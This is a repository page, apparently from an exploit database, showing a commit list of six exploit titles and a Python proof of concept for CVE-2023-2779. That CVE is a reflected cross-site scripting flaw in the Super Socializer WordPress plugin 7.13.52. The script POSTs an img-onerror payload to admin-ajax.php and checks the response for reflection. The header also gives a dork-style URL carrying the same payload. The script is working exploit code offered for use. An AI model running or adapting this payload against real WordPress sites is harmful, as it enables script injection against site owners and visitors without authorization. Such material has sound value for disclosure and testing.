cc495bca11
8 changes to exploits/shellcodes/ghdb Nokia ASIKA 7.13.52 - Hard-coded private key disclosure SPIP v4.2.1 - Remote Code Execution (Unauthenticated) Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS) Super Socializer 7.13.52 - Reflected XSS WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS) PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
28 lines
No EOL
1.2 KiB
Python
Executable file
28 lines
No EOL
1.2 KiB
Python
Executable file
# Exploit Title: Super Socializer 7.13.52 - Reflected XSS
|
|
# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com
|
|
# Date: 2023-06-20
|
|
# Exploit Author: Amirhossein Bahramizadeh
|
|
# Category : Webapps
|
|
# Vendor Homepage: https://wordpress.org/plugins/super-socializer
|
|
# Version: 7.13.52 (REQUIRED)
|
|
# Tested on: Windows/Linux
|
|
# CVE : CVE-2023-2779
|
|
import requests
|
|
|
|
# The URL of the vulnerable AJAX endpoint
|
|
url = "https://example.com/wp-admin/admin-ajax.php"
|
|
|
|
# The vulnerable parameter that is not properly sanitized and escaped
|
|
vulnerable_param = "<img src=x onerror=alert(document.domain)>"
|
|
|
|
# The payload that exploits the vulnerability
|
|
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}
|
|
|
|
# Send a POST request to the vulnerable endpoint with the payload
|
|
response = requests.post(url, data=payload)
|
|
|
|
# Check if the payload was executed by searching for the injected script tag
|
|
if "<img src=x onerror=alert(document.domain)>" in response.text:
|
|
print("Vulnerability successfully exploited")
|
|
else:
|
|
print("Vulnerability not exploitable") |